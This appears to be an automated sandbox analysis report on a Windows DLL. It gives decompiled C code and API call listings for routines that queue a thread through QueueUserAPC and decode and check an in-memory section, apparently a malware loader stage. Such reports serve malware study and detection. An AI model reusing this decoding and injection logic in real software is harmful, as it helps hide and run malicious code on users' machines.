                                                                                                                                                                                                                                                          0x6ddf18b5
                                                                                                                                                                                                                                                          0x6ddf1889
                                                                                                                                                                                                                                                          0x6ddf188c
                                                                                                                                                                                                                                                          0x6ddf1894
                                                                                                                                                                                                                                                          0x6ddf1898
                                                                                                                                                                                                                                                          0x6ddf18a0
                                                                                                                                                                                                                                                          0x6ddf18a0
                                                                                                                                                                                                                                                          0x6ddf18a7
                                                                                                                                                                                                                                                          0x6ddf18a7
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1887
                                                                                                                                                                                                                                                          0x6ddf182d
                                                                                                                                                                                                                                                          0x6ddf186c
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf186c
                                                                                                                                                                                                                                                          0x6ddf182f
                                                                                                                                                                                                                                                          0x6ddf1833
                                                                                                                                                                                                                                                          0x6ddf183e
                                                                                                                                                                                                                                                          0x6ddf1842
                                                                                                                                                                                                                                                          0x6ddf1864
                                                                                                                                                                                                                                                          0x6ddf1864
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1864
                                                                                                                                                                                                                                                          0x6ddf1844
                                                                                                                                                                                                                                                          0x6ddf1849
                                                                                                                                                                                                                                                          0x6ddf1850
                                                                                                                                                                                                                                                          0x6ddf1855
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1857
                                                                                                                                                                                                                                                          0x6ddf185a
                                                                                                                                                                                                                                                          0x6ddf185d
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf185d

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6DDF17B8,751463F0,00000000), ref: 6DDF147B
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF146C: GetVersion.KERNEL32 ref: 6DDF148A
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF146C: GetCurrentProcessId.KERNEL32 ref: 6DDF1499
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6DDF14B2
                                                                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?,751463F0,00000000), ref: 6DDF17CB
                                                                                                                                                                                                                                                          • SwitchToThread.KERNEL32 ref: 6DDF17D1
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF15A3: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6DDF15F9
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF15A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6DDF17EC), ref: 6DDF168B
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF15A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6DDF16A6
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,00000000), ref: 6DDF17F4
                                                                                                                                                                                                                                                          • GetLongPathNameW.KERNEL32 ref: 6DDF183C
                                                                                                                                                                                                                                                          • GetLongPathNameW.KERNEL32 ref: 6DDF185A
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,6DDF16EC,?,00000000), ref: 6DDF188C
                                                                                                                                                                                                                                                          • GetExitCodeThread.KERNEL32(00000000,?), ref: 6DDF18A0
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6DDF18A7
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(6DDF16EC,?,00000000), ref: 6DDF18AF
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6DDF18C2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481707727.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481697233.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481717024.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481730026.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481741873.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2280543912-0
                                                                                                                                                                                                                                                          • Opcode ID: e81c80fd7f690b2be0f15f0099e7f67bbbd3af30a1d6db6743007276aba34ebd
                                                                                                                                                                                                                                                          • Instruction ID: 41abd2c9c64a475964c50c369dceb5c0e3f62a596db5ba94c85f068c08f7d71e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e81c80fd7f690b2be0f15f0099e7f67bbbd3af30a1d6db6743007276aba34ebd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38317EB1848712BBD711FF659944A6B77FCEA86754F130E2AF964C2140E730C9068AB2
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                                                                          			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                                                                          				char _t9;
                                                                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                                                                          				void* _t36;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                                                          				_t9 = _a8;
                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                          				if(_t9 == 0) {
                                                                                                                                                                                                                                                          					_t10 = InterlockedDecrement(0x6ddf4188);
                                                                                                                                                                                                                                                          					__eflags = _t10;
                                                                                                                                                                                                                                                          					if(_t10 == 0) {
                                                                                                                                                                                                                                                          						__eflags =  *0x6ddf418c;
                                                                                                                                                                                                                                                          						if( *0x6ddf418c != 0) {
                                                                                                                                                                                                                                                          							_t36 = 0x2328;
                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                          								SleepEx(0x64, 1);
                                                                                                                                                                                                                                                          								__eflags =  *0x6ddf4198;
                                                                                                                                                                                                                                                          								if( *0x6ddf4198 == 0) {
                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          								_t36 = _t36 - 0x64;
                                                                                                                                                                                                                                                          								__eflags = _t36;
                                                                                                                                                                                                                                                          								if(_t36 > 0) {
                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							CloseHandle( *0x6ddf418c);
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          						HeapDestroy( *0x6ddf4190);
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                          					if(_t9 == 1 && InterlockedIncrement(0x6ddf4188) == 1) {
                                                                                                                                                                                                                                                          						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                                          						_t41 = _t18;
                                                                                                                                                                                                                                                          						 *0x6ddf4190 = _t18;
                                                                                                                                                                                                                                                          						if(_t18 == 0) {
                                                                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                                                                          							_v8 = 0;
                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                          							 *0x6ddf41b0 = _a4;
                                                                                                                                                                                                                                                          							asm("lock xadd [eax], edi");
                                                                                                                                                                                                                                                          							_push( &_a8);
                                                                                                                                                                                                                                                          							_t23 = E6DDF1CA4(E6DDF1D32, E6DDF1EE0(_a12, 1, 0x6ddf4198, _t41));
                                                                                                                                                                                                                                                          							 *0x6ddf418c = _t23;
                                                                                                                                                                                                                                                          							if(_t23 == 0) {
                                                                                                                                                                                                                                                          								asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                                          								goto L6;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                          0x6ddf1e07
                                                                                                                                                                                                                                                          0x6ddf1e13
                                                                                                                                                                                                                                                          0x6ddf1e15
                                                                                                                                                                                                                                                          0x6ddf1e18
                                                                                                                                                                                                                                                          0x6ddf1e8e
                                                                                                                                                                                                                                                          0x6ddf1e94
                                                                                                                                                                                                                                                          0x6ddf1e96
                                                                                                                                                                                                                                                          0x6ddf1e98
                                                                                                                                                                                                                                                          0x6ddf1e9e
                                                                                                                                                                                                                                                          0x6ddf1ea0
                                                                                                                                                                                                                                                          0x6ddf1ea5
                                                                                                                                                                                                                                                          0x6ddf1ea8
                                                                                                                                                                                                                                                          0x6ddf1eb3
                                                                                                                                                                                                                                                          0x6ddf1eb5
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1eb7
                                                                                                                                                                                                                                                          0x6ddf1eba
                                                                                                                                                                                                                                                          0x6ddf1ebc
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1ebc
                                                                                                                                                                                                                                                          0x6ddf1ec4
                                                                                                                                                                                                                                                          0x6ddf1ec4
                                                                                                                                                                                                                                                          0x6ddf1ed0
                                                                                                                                                                                                                                                          0x6ddf1ed0
                                                                                                                                                                                                                                                          0x6ddf1e1a
                                                                                                                                                                                                                                                          0x6ddf1e1b
                                                                                                                                                                                                                                                          0x6ddf1e3b
                                                                                                                                                                                                                                                          0x6ddf1e41
                                                                                                                                                                                                                                                          0x6ddf1e43
                                                                                                                                                                                                                                                          0x6ddf1e48
                                                                                                                                                                                                                                                          0x6ddf1e84
                                                                                                                                                                                                                                                          0x6ddf1e84
                                                                                                                                                                                                                                                          0x6ddf1e4a
                                                                                                                                                                                                                                                          0x6ddf1e52
                                                                                                                                                                                                                                                          0x6ddf1e59
                                                                                                                                                                                                                                                          0x6ddf1e63
                                                                                                                                                                                                                                                          0x6ddf1e6f
                                                                                                                                                                                                                                                          0x6ddf1e76
                                                                                                                                                                                                                                                          0x6ddf1e7b
                                                                                                                                                                                                                                                          0x6ddf1e80
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1e80
                                                                                                                                                                                                                                                          0x6ddf1e7b
                                                                                                                                                                                                                                                          0x6ddf1e48
                                                                                                                                                                                                                                                          0x6ddf1e1b
                                                                                                                                                                                                                                                          0x6ddf1edd

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(6DDF4188), ref: 6DDF1E26
                                                                                                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 6DDF1E3B
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF1CA4: CreateThread.KERNEL32 ref: 6DDF1CBB
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF1CA4: QueueUserAPC.KERNEL32(?,00000000,?), ref: 6DDF1CD0
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF1CA4: GetLastError.KERNEL32(00000000), ref: 6DDF1CDB
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF1CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6DDF1CE5
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF1CA4: CloseHandle.KERNEL32(00000000), ref: 6DDF1CEC
                                                                                                                                                                                                                                                            • Part of subcall function 6DDF1CA4: SetLastError.KERNEL32(00000000), ref: 6DDF1CF5
                                                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(6DDF4188), ref: 6DDF1E8E
                                                                                                                                                                                                                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 6DDF1EA8
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 6DDF1EC4
                                                                                                                                                                                                                                                          • HeapDestroy.KERNEL32 ref: 6DDF1ED0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481707727.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481697233.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481717024.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481730026.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481741873.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2110400756-0
                                                                                                                                                                                                                                                          • Opcode ID: dc817ed16920f9fd1f85b76d3246150d4a1b48f76d596184586828b4f9add3f9
                                                                                                                                                                                                                                                          • Instruction ID: b92a8a551d8751c7487def5bbe9b649440a82ad7219eb5dd8a4bae76fd84ed5c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc817ed16920f9fd1f85b76d3246150d4a1b48f76d596184586828b4f9add3f9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB2184B1A40206EFEB00BFE9ED84B6A7BB8FB5A365713412AF515D3141E730C906CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                          			E6DDF1CA4(long _a4, DWORD* _a12) {
                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _v0;
                                                                                                                                                                                                                                                          				void* _t4;
                                                                                                                                                                                                                                                          				long _t6;
                                                                                                                                                                                                                                                          				long _t11;
                                                                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6ddf41cc, 0, _a12); // executed
                                                                                                                                                                                                                                                          				_t13 = _t4;
                                                                                                                                                                                                                                                          				if(_t13 != 0) {
                                                                                                                                                                                                                                                          					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                                                                                                                                                                                                                          					if(_t6 == 0) {
                                                                                                                                                                                                                                                          						_t11 = GetLastError();
                                                                                                                                                                                                                                                          						TerminateThread(_t13, _t11);
                                                                                                                                                                                                                                                          						CloseHandle(_t13);
                                                                                                                                                                                                                                                          						_t13 = 0;
                                                                                                                                                                                                                                                          						SetLastError(_t11);
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				return _t13;
                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                          0x6ddf1cbb
                                                                                                                                                                                                                                                          0x6ddf1cc1
                                                                                                                                                                                                                                                          0x6ddf1cc5
                                                                                                                                                                                                                                                          0x6ddf1cd0
                                                                                                                                                                                                                                                          0x6ddf1cd8
                                                                                                                                                                                                                                                          0x6ddf1ce1
                                                                                                                                                                                                                                                          0x6ddf1ce5
                                                                                                                                                                                                                                                          0x6ddf1cec
                                                                                                                                                                                                                                                          0x6ddf1cf3
                                                                                                                                                                                                                                                          0x6ddf1cf5
                                                                                                                                                                                                                                                          0x6ddf1cfb
                                                                                                                                                                                                                                                          0x6ddf1cd8
                                                                                                                                                                                                                                                          0x6ddf1cff

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 6DDF1CBB
                                                                                                                                                                                                                                                          • QueueUserAPC.KERNEL32(?,00000000,?), ref: 6DDF1CD0
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 6DDF1CDB
                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 6DDF1CE5
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6DDF1CEC
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000), ref: 6DDF1CF5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481707727.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481697233.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481717024.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481730026.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481741873.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3832013932-0
                                                                                                                                                                                                                                                          • Opcode ID: 6ad7e71c6ce5245b9fa70baa9a7502c0bd0a9912b45aef6acdb66625d2892e71
                                                                                                                                                                                                                                                          • Instruction ID: c8e20a197b87dae5aa9091511ce51577caa7cb44e8634b6a632d6fccfe3b2d2b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ad7e71c6ce5245b9fa70baa9a7502c0bd0a9912b45aef6acdb66625d2892e71
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36F01276245621BBEB117FA0AC0CF5BBF79FB0A755F024405FA0591151C72188119BAA
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3136044242-0
                                                                                                                                                                                                                                                          • Opcode ID: 6a239367ff97cd0305287699f3b90df4ed213882566a870ebd34730c81fdb391
                                                                                                                                                                                                                                                          • Instruction ID: 2b87e4c9354f9012ce1a144f5639eeef7f517a0465a234262c58401ed5d7a458
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a239367ff97cd0305287699f3b90df4ed213882566a870ebd34730c81fdb391
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0219471D04739FBDB266E54CC40ABF3A79EB85698F234119F81467610CB308E03CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __RTC_Initialize.LIBCMT ref: 6DE37387
                                                                                                                                                                                                                                                            • Part of subcall function 6DE37BA4: RtlInitializeSListHead.NTDLL(6DE7C780), ref: 6DE37BA9
                                                                                                                                                                                                                                                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6DE373F1
                                                                                                                                                                                                                                                          • ___scrt_fastfail.LIBCMT ref: 6DE3743B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481764379.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                          • String ID: ym
                                                                                                                                                                                                                                                          • API String ID: 2097537958-2567925931
                                                                                                                                                                                                                                                          • Opcode ID: 666801027a55f97e3a23701d656bfd9d6cd441d26fc371e74d22a7bfef79a88d
                                                                                                                                                                                                                                                          • Instruction ID: af419aaefb9eeaa3da4893b8e8e0b2197aa4f62a32966191de4adaa6bca7c65f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 666801027a55f97e3a23701d656bfd9d6cd441d26fc371e74d22a7bfef79a88d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91218E32A4C232DADB05BBB4A9047BC7BB19F0632DF33845DDA807B2C1DF615545C665
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                                                          			E6DDF15A3(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                          				unsigned int _v12;
                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                          				intOrPtr _t47;
                                                                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                                                                          				intOrPtr _t66;
                                                                                                                                                                                                                                                          				intOrPtr _t77;
                                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                                          				signed int _t80;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t77 =  *0x6ddf41b0;
                                                                                                                                                                                                                                                          				_t39 = E6DDF1A4B(_t77,  &_v20,  &_v12);
                                                                                                                                                                                                                                                          				_v16 = _t39;
                                                                                                                                                                                                                                                          				if(_t39 == 0) {
                                                                                                                                                                                                                                                          					asm("sbb ebx, ebx");
                                                                                                                                                                                                                                                          					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                                                                                                                                                                                                                                          					_t78 = _t77 + _v20;
                                                                                                                                                                                                                                                          					_v36 = _t78;
                                                                                                                                                                                                                                                          					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                          					_v24 = _t46;
                                                                                                                                                                                                                                                          					if(_t46 == 0) {
                                                                                                                                                                                                                                                          						_v16 = 8;
                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                          						_t61 = 0;
                                                                                                                                                                                                                                                          						if(_t59 <= 0) {
                                                                                                                                                                                                                                                          							_t47 =  *0x6ddf41cc;
                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                          							_t66 = _a4;
                                                                                                                                                                                                                                                          							_t50 = _t46 - _t78;
                                                                                                                                                                                                                                                          							_t11 = _t66 + 0x6ddf5137; // 0x6ddf5137
                                                                                                                                                                                                                                                          							_v28 = _t50;
                                                                                                                                                                                                                                                          							_v32 = _t50 + _t11;
                                                                                                                                                                                                                                                          							_v8 = _t78;
                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                          								asm("movsd");
                                                                                                                                                                                                                                                          								asm("movsd");
                                                                                                                                                                                                                                                          								asm("movsd");
                                                                                                                                                                                                                                                          								_t19 = _t61 + 1; // 0x2
                                                                                                                                                                                                                                                          								_t80 = _t19;
                                                                                                                                                                                                                                                          								E6DDF1D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                                                                                                                                                                                                                                          								_t64 = _v32;
                                                                                                                                                                                                                                                          								_v8 = _v8 + 0x1000;
                                                                                                                                                                                                                                                          								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                                                                                                                                                                                                                                          								_t61 = _t80;
                                                                                                                                                                                                                                                          								 *0x6ddf41cc = _t47;
                                                                                                                                                                                                                                                          								if(_t61 >= _t59) {
                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          								_t50 = _v28;
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          						if(_t47 != 0x63699bc3) {
                                                                                                                                                                                                                                                          							_v16 = 0xc;
                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                          							memcpy(_v36, _v24, _v12);
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          						VirtualFree(_v24, 0, 0x8000); // executed
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				return _v16;
                                                                                                                                                                                                                                                          			}























                                                                                                                                                                                                                                                          0x6ddf15aa
                                                                                                                                                                                                                                                          0x6ddf15ba
                                                                                                                                                                                                                                                          0x6ddf15c1
                                                                                                                                                                                                                                                          0x6ddf15c4
                                                                                                                                                                                                                                                          0x6ddf15d9
                                                                                                                                                                                                                                                          0x6ddf15e0
                                                                                                                                                                                                                                                          0x6ddf15e5
                                                                                                                                                                                                                                                          0x6ddf15f6
                                                                                                                                                                                                                                                          0x6ddf15f9
                                                                                                                                                                                                                                                          0x6ddf1601
                                                                                                                                                                                                                                                          0x6ddf1604
                                                                                                                                                                                                                                                          0x6ddf16ae
                                                                                                                                                                                                                                                          0x6ddf160a
                                                                                                                                                                                                                                                          0x6ddf160a
                                                                                                                                                                                                                                                          0x6ddf160e
                                                                                                                                                                                                                                                          0x6ddf1676
                                                                                                                                                                                                                                                          0x6ddf1610
                                                                                                                                                                                                                                                          0x6ddf1610
                                                                                                                                                                                                                                                          0x6ddf1613
                                                                                                                                                                                                                                                          0x6ddf1615
                                                                                                                                                                                                                                                          0x6ddf161d
                                                                                                                                                                                                                                                          0x6ddf1620
                                                                                                                                                                                                                                                          0x6ddf1623
                                                                                                                                                                                                                                                          0x6ddf162b
                                                                                                                                                                                                                                                          0x6ddf1633
                                                                                                                                                                                                                                                          0x6ddf1634
                                                                                                                                                                                                                                                          0x6ddf1635
                                                                                                                                                                                                                                                          0x6ddf163c
                                                                                                                                                                                                                                                          0x6ddf163c
                                                                                                                                                                                                                                                          0x6ddf1650
                                                                                                                                                                                                                                                          0x6ddf1655
                                                                                                                                                                                                                                                          0x6ddf165e
                                                                                                                                                                                                                                                          0x6ddf1665
                                                                                                                                                                                                                                                          0x6ddf1668
                                                                                                                                                                                                                                                          0x6ddf166c
                                                                                                                                                                                                                                                          0x6ddf1671
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf1628
                                                                                                                                                                                                                                                          0x6ddf1628
                                                                                                                                                                                                                                                          0x6ddf1673
                                                                                                                                                                                                                                                          0x6ddf1680
                                                                                                                                                                                                                                                          0x6ddf1695
                                                                                                                                                                                                                                                          0x6ddf1682
                                                                                                                                                                                                                                                          0x6ddf168b
                                                                                                                                                                                                                                                          0x6ddf1690
                                                                                                                                                                                                                                                          0x6ddf16a6
                                                                                                                                                                                                                                                          0x6ddf16a6
                                                                                                                                                                                                                                                          0x6ddf16b5
                                                                                                                                                                                                                                                          0x6ddf16bb

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6DDF15F9
                                                                                                                                                                                                                                                          • memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6DDF17EC), ref: 6DDF168B
                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6DDF16A6
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.481707727.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481697233.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481717024.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481730026.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.481741873.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                                          • String ID: Mar 26 2021
                                                                                                                                                                                                                                                          • API String ID: 4010158826-2175073649
